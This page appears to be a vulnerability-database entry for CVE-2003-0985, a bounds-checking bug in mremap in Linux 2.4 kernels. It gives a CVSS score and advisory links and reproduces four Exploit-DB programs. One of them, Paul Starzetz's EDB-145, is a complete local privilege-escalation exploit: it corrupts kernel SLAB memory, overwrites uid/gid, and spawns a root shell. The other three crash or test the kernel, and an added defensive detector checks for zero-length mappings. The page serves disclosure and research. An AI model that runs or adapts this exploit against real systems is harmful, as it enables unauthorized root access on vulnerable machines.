CVE-2003-0985 : Detail

CVE-2003-0985

0.57%V4
Local
2004-09-01 02h00 +00:00
2011-07-16 22h00 +00:00

CVE Descriptions

The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of others.

Exploit information

Exploit Database EDB-ID : 154

Publication date : 2004-02-17 23h00 +00:00
Author : Christophe Devine
EDB Verified : Yes

/*
 * Proof-of-concept exploit code for do_mremap() #2
 *
 * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
 * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
 *
 *
 * Copyright (C) 2004 Christophe Devine
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

#define VMA_SIZE 0x00003000

int main( void )
{
    int i, ret;
    void *base0;
    void *base1;

    i = 0;

    while( 1 )
    {
        i++;

        ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
                          VMA_SIZE, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

        if( ret == -1 )
        {
            perror( "mmap" );
            break;
        }

        base0 = base1;
        base1 = (void *) ret;
    }

    printf( "created ~%d VMAs\n", i );

    base0 += 0x1000;
    base1 += 0x1000;

    printf( "now mremapping 0x%08X at 0x%08X\n",
            (int) base1, (int) base0 );

    real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );

    printf( "kernel may not be vulnerable\n" );

    return( 0 );
}

// milw0rm.com [2004-02-18]

Exploit Database EDB-ID : 145

Publication date : 2004-01-14 23h00 +00:00
Author : Paul Starzetz
EDB Verified : Yes

/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul isec pl>
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define str(s) #s
#define xstr(s) str(s)

#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000

#define RNDINT 512

#define NUMVMA (3 * 5 * 257)
#define NUMFORK (17 * 65537)

#define DUPTO 1000
#define TMPLEN 256

#define __NR_sys_mremap 163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
                         unsigned long new_len, unsigned long flags,
                         unsigned long new_addr);

static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];

void fatal(const char * msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\nentering endless loop");
    fflush(stdout);
    fflush(stderr);
    while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
    int i, c;
    int *v;

    if (!file)
        goto out;

    __asm__("movl %%esp, %0" : : "m" (c));

    c &= 0xffffe000;
    v = (void *) c;

    for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
        if (v[i] == uid && v[i+1] == uid) {
            i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
        }
        if (v[i] == gid) {
            v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
            break;
        }
    }
out:
    dummy++;
}

void try_to_exploit(void)
{
    int v = 0;

    v += fops[0];
    v += fake_file[0];

    kernel_code(0, 0, v);
    lseek(DUPTO, 0, SEEK_SET);

    if (geteuid()) {
        printf("\nFAILED uid!=0"); fflush(stdout);
        errno =- ENOSYS;
        fatal("uid change");
    }

    printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

    kill(ppid, SIGUSR1);
    setresuid(0, 0, 0);
    sleep(1);

    printf("\n\n"); fflush(stdout);

    execl("/bin/bash", "bash", NULL);
    fatal("burp");
}

void cleanup(int v)
{
    victim[DUPTO] = victim[0];
    kill(0, SIGUSR2);
}

void redirect_filp(int v)
{
    printf("\n[!] parent check race... "); fflush(stdout);

    if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
        printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        victim[DUPTO] = (unsigned) & fake_file;
        signal(SIGUSR1, &cleanup);
        kill(pid, SIGUSR1);
    } else {
        printf("FAILED!");
    }
    fflush(stdout);
}

int get_slab_objs(void)
{
    FILE * fp;
    int c, d, u = 0, a = 0;
    static char line[TMPLEN], name[TMPLEN];

    fp = fopen("/proc/slabinfo", "r");
    if (!fp)
        fatal("fopen");

    fgets(name, sizeof(name) - 1, fp);
    do {
        c = u = a =- 1;
        if (!fgets(line, sizeof(line) - 1, fp))
            break;
        c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
    } while (strcmp(name, "size-4096"));

    fclose(fp);

    return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
    int n, c = 1;

    *victim = 0;
    printf("\n[+] parent unprotected PTE "); fflush(stdout);

    dup2(0, 2);
    while (1) {
        n = get_slab_objs();
        if (n < 0)
            fatal("read slabinfo");
        if (n > 0) {
            printf("\n depopulate SLAB #%d", c++);
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
        }
        if (!n) {
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
            dup2(0, DUPTO);
            break;
        }
    }

    signal(SIGUSR1, &redirect_filp);
    kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
    int i = NUMVMA;

    while (1) {
        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
                   MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap1");
        }
        i--;
        if (!i)
            break;

        tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
                   MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
        if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap2");
        }
        i--;
        if (!i)
            break;
    }
}

void catchme(int v)
{
    blah++;
}

void exitme(int v)
{
    _exit(0);
}

void childrip(int v)
{
    waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
    signal(SIGUSR1, &catchme);
    signal(SIGUSR2, &exitme);
    blah = 0;

    while (1) {
        while (!blah) pause();

        blah = 0;
        if (!fork()) {
            dup2(0, DUPTO);
            kill(getppid(), SIGUSR1);
            while (1) pause();
        } else {
            while (!blah) pause();
            blah = 0; kill(ppid, SIGUSR2);
        }
    }
    exit(0);
}

int main(void)
{
    int i, r, v, cnt;
    time_t start;

    srand(time(NULL) + getpid());
    ppid = getpid();
    uid = getuid();
    gid = getgid();

    hpid = fork();
    if (!hpid)
        slab_helper();

    fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
                MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (fops == MAP_FAILED)
        fatal("mmap fops VMA");
    for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
        fops[i] = (unsigned)&kernel_code;
    for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
        fake_file[i] = (unsigned)fops;

    vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_ro == MAP_FAILED)
        fatal("mmap1");

    vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_rw == MAP_FAILED)
        fatal("mmap2");

    cnt = NUMVMA;
    while (1) {
        r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap1");
        }
        cnt--;
        if (!cnt) break;

        r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap2");
        }
        cnt--;
        if (!cnt) break;
    }

    victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
                  MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (victim != (void *) PAGEADDR)
        fatal("mmap victim VMA");

    v = *victim;
    *victim = v + 1;

    signal(SIGUSR1, &unprotect);
    signal(SIGUSR2, &catchme);
    signal(SIGCHLD, &childrip);
    printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
    start = time(NULL);

    cnt = NUMFORK;
    v = 0;
    while (1) {
        cnt--;
        v--;
        dummy += *victim;

        if (cnt > 1) {
            __asm__(
                "pusha \n"
                "movl %1, %%eax \n"
                "movl $("xstr(CLONEFL)"), %%ebx \n"
                "movl %%esp, %%ecx \n"
                "movl $120, %%eax \n"
                "int $0x80 \n"
                "movl %%eax, %0 \n"
                "popa \n"
                : : "m" (pid), "m" (dummy)
            );
        } else {
            pid = fork();
        }

        if (pid) {
            if (v <= 0 && cnt > 0) {
                float eta, tm;
                v = rand() % RNDINT / 2 + RNDINT / 2;
                tm = eta = (float)(time(NULL) - start);
                eta *= (float)NUMFORK;
                eta /= (float)(NUMFORK - cnt);
                printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ",
                       NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
                fflush(stdout);
            }
            if (cnt) {
                waitpid(pid, 0, 0);
                continue;
            }
            if (!cnt) {
                while (1) {
                    r = wait(NULL);
                    if (r == pid) {
                        cleanup_vmas();
                        while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
                    }
                }
            }
        } else {
            cleanup_vmas();

            if (cnt > 0) {
                _exit(0);
            }

            printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
            sleep(1);

            signal(SIGUSR1, &catchme);
            munmap(0, PAGE_SIZE);
            dup2(0, 2);
            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();

            munmap((void *)victim, PAGE_SIZE);
            dup2(0, DUPTO);

            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();
            try_to_exploit();
            while (1) pause();
        }
    }
    return 0;
}

// milw0rm.com [2004-01-15]

Exploit Database EDB-ID : 141

Publication date : 2004-01-05 23h00 +00:00
Author : Christophe Devine
EDB Verified : Yes

/*
 * EDB Note: This will just "test" the vulnerability.
 * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
 */

/*
 * Proof-of-concept exploit code for do_mremap()
 *
 * Copyright (C) 2004 Christophe Devine and Julien Tinnes
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

// milw0rm.com [2004-01-06]

Exploit Database EDB-ID : 142

Publication date : 2004-01-06 23h00 +00:00
Author : Christophe Devine
EDB Verified : Yes

/*
 * EDB Note: This will just "test" the vulnerability.
 * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
 */

/*
 * Proof of concept code for testing do_mremap() Linux kernel bug.
 * It is based on the code by Christophe Devine and Julien Tinnes
 * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since
 * it avoids any kernel data corruption.
 *
 * The following test was done against the Linux kernel 2.6.0. Similar
 * results were obtained against the kernel 2.4.23 and previous ones.
 *
 * buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
 * buffer@mintaka:~$ ./mremap_bug
 *
 * Base address : 0x60000000
 *
 * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 *
 * Remapping at 0x70000000...
 *
 * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * 70000000-70000000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 *
 * Report :
 * This kernel appears to be VULNERABLE
 *
 * Segmentation fault
 * buffer@mintaka:~$
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>

#define MREMAP_FIXED 2

#define PAGESIZE 4096
#define VMASIZE (2*PAGESIZE)
#define BUFSIZE 8192

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

#define MAPS_NO_CHECK 0
#define MAPS_CHECK 1

int mremap_check = 0;

void maps_check(char *buf)
{
    if (strstr(buf, "70000000"))
        mremap_check++;
}

void read_maps(int fd, char *path, unsigned long flag)
{
    ssize_t nbytes;
    char buf[BUFSIZE];

    if (lseek(fd, 0, SEEK_SET) < 0) {
        fprintf(stderr, "Unable to lseek %s\n", path);
        return;
    }

    while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {

        if (flag & MAPS_CHECK)
            maps_check(buf);

        if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
            fprintf(stderr, "Unable to read %s\n", path);
            exit (1);
        }
    }
}

int main(int argc, char **argv)
{
    void *base;
    char path[16];
    pid_t pid;
    int fd;

    pid = getpid();
    sprintf(path, "/proc/%d/maps", pid);

    if ( !(fd = open(path, O_RDONLY))) {
        fprintf(stderr, "Unable to open %s\n", path);
        return 1;
    }

    base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);

    printf("\nBase address : 0x%x\n\n", base);
    read_maps(fd, path, MAPS_NO_CHECK);

    printf("\nRemapping at 0x70000000...\n\n");
    base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                       (void *)0x70000000);

    read_maps(fd, path, MAPS_CHECK);

    printf("\nReport : \n");
    (mremap_check)
        ? printf("This kernel appears to be VULNERABLE\n\n")
        : printf("This kernel appears to be NOT VULNERABLE\n\n");

    close(fd);
    return 0;
}

// milw0rm.com [2004-01-07]
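
A defensive counterpart to the check in the test program above, added here as an example (not code from the original page or its authors): rather than searching the maps output for one hard-coded address, it parses each address range and flags any entry whose start equals its end, the zero-length VMA named in the CVE description. The sample maps text is constructed from the output quoted in the EDB-142 comment, and all function names are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Address range of one /proc/<pid>/maps entry. */
struct vma_range { unsigned long start, end; };

/* Constructed samples, abridged from the output quoted in the EDB-142 comment. */
static const char MAPS_BEFORE[] =
    "60000000-60002000 rw-p 00000000 00:00 0\n"
    "bfffd000-c0000000 rwxp ffffe000 00:00 0\n";
static const char MAPS_AFTER[] =
    "60000000-60002000 rw-p 00000000 00:00 0\n"
    "70000000-70000000 rw-p 00000000 00:00 0\n"
    "bfffd000-c0000000 rwxp ffffe000 00:00 0\n";

/* Returns 1 when the line is a maps entry whose start equals its end. */
int is_zero_length_vma(const char *line, struct vma_range *out)
{
    struct vma_range r;
    if (sscanf(line, "%lx-%lx", &r.start, &r.end) != 2 || r.start != r.end)
        return 0;                          /* not an entry, or a normal VMA */
    if (out) *out = r;
    return 1;
}

/* Counts zero-length entries in a maps text; *first receives the first hit. */
int count_zero_length_vmas(const char *text, struct vma_range *first)
{
    int hits = 0;
    while (*text) {
        size_t len = strcspn(text, "\n");  /* length of the current line */
        size_t n = len < 255 ? len : 255;  /* the range sits at the line start */
        char line[256];
        memcpy(line, text, n);
        line[n] = '\0';
        if (is_zero_length_vma(line, hits == 0 ? first : NULL))
            hits++;
        text += len + (text[len] == '\n'); /* step past the newline, if any */
    }
    return hits;
}

/* Same check over a live file such as /proc/self/maps; -1 if unreadable. */
int scan_maps_file(const char *path)
{
    char line[512];
    int hits = 0;
    FILE *fp = fopen(path, "r");
    if (!fp)
        return -1;
    while (fgets(line, sizeof line, fp))
        hits += is_zero_length_vma(line, NULL);
    fclose(fp);
    return hits;
}

int main(void)
{
    struct vma_range r;
    printf("before: %d hit(s)\n", count_zero_length_vmas(MAPS_BEFORE, NULL));
    if (count_zero_length_vmas(MAPS_AFTER, &r))
        printf("after: zero-length VMA at %08lx\n", r.start);
    return 0;
}
```

`scan_maps_file("/proc/self/maps")` applies the same test to a running process; a non-zero result means the kernel accepted a mapping with no extent.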

Products Mentioned

Configuration 0

Linux>>Linux_kernel >> Version 2.4.0
Linux>>Linux_kernel >> Version 2.4.1
Linux>>Linux_kernel >> Version 2.4.2
Linux>>Linux_kernel >> Version 2.4.3
Linux>>Linux_kernel >> Version 2.4.4
Linux>>Linux_kernel >> Version 2.4.5
Linux>>Linux_kernel >> Version 2.4.6
Linux>>Linux_kernel >> Version 2.4.7
Linux>>Linux_kernel >> Version 2.4.8
Linux>>Linux_kernel >> Version 2.4.9
Linux>>Linux_kernel >> Version 2.4.10
Linux>>Linux_kernel >> Version 2.4.11
Linux>>Linux_kernel >> Version 2.4.12
Linux>>Linux_kernel >> Version 2.4.13
Linux>>Linux_kernel >> Version 2.4.14
Linux>>Linux_kernel >> Version 2.4.15
Linux>>Linux_kernel >> Version 2.4.16
Linux>>Linux_kernel >> Version 2.4.17
Linux>>Linux_kernel >> Version 2.4.18
Linux>>Linux_kernel >> Version 2.4.19
Linux>>Linux_kernel >> Version 2.4.20
Linux>>Linux_kernel >> Version 2.4.21
Linux>>Linux_kernel >> Version 2.4.22
Linux>>Linux_kernel >> Version 2.4.23

References

http://secunia.com/advisories/20163 (Tags: third-party-advisory, x_refsource_SECUNIA)
http://www.debian.org/security/2006/dsa-1082 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2004/dsa-423 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.redhat.com/support/errata/RHSA-2003-417.html (Tags: vendor-advisory, x_refsource_REDHAT)
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799 (Tags: vendor-advisory, x_refsource_CONECTIVA)
http://www.debian.org/security/2004/dsa-450 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2006/dsa-1070 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2004/dsa-440 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://marc.info/?l=bugtraq&m=107394143105081&w=2 (Tags: mailing-list, x_refsource_BUGTRAQ)
http://www.debian.org/security/2004/dsa-439 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2006/dsa-1067 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2004/dsa-475 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2006/dsa-1069 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2004/dsa-417 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.debian.org/security/2004/dsa-442 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://secunia.com/advisories/20202 (Tags: third-party-advisory, x_refsource_SECUNIA)
http://www.debian.org/security/2004/dsa-470 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://secunia.com/advisories/20338 (Tags: third-party-advisory, x_refsource_SECUNIA)
http://www.redhat.com/support/errata/RHSA-2003-416.html (Tags: vendor-advisory, x_refsource_REDHAT)
http://www.debian.org/security/2004/dsa-413 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://marc.info/?l=bugtraq&m=107340358402129&w=2 (Tags: mailing-list, x_refsource_BUGTRAQ)
http://marc.info/?l=bugtraq&m=107350348418373&w=2 (Tags: mailing-list, x_refsource_BUGTRAQ)
http://marc.info/?l=bugtraq&m=107340814409017&w=2 (Tags: mailing-list, x_refsource_BUGTRAQ)
http://marc.info/?l=bugtraq&m=107332754521495&w=2 (Tags: vendor-advisory, x_refsource_TRUSTIX)
http://www.osvdb.org/3315 (Tags: vdb-entry, x_refsource_OSVDB)
http://www.securityfocus.com/bid/9356 (Tags: vdb-entry, x_refsource_BID)
http://marc.info/?l=bugtraq&m=107332782121916&w=2 (Tags: mailing-list, x_refsource_BUGTRAQ)
http://www.debian.org/security/2004/dsa-427 (Tags: vendor-advisory, x_refsource_DEBIAN)
http://www.redhat.com/support/errata/RHSA-2003-418.html (Tags: vendor-advisory, x_refsource_REDHAT)
http://www.ciac.org/ciac/bulletins/o-045.shtml (Tags: third-party-advisory, government-resource, x_refsource_CIAC)
http://www.redhat.com/support/errata/RHSA-2003-419.html (Tags: vendor-advisory, x_refsource_REDHAT)
http://secunia.com/advisories/10532 (Tags: third-party-advisory, x_refsource_SECUNIA)
http://www.kb.cert.org/vuls/id/490620 (Tags: third-party-advisory, x_refsource_CERT-VN)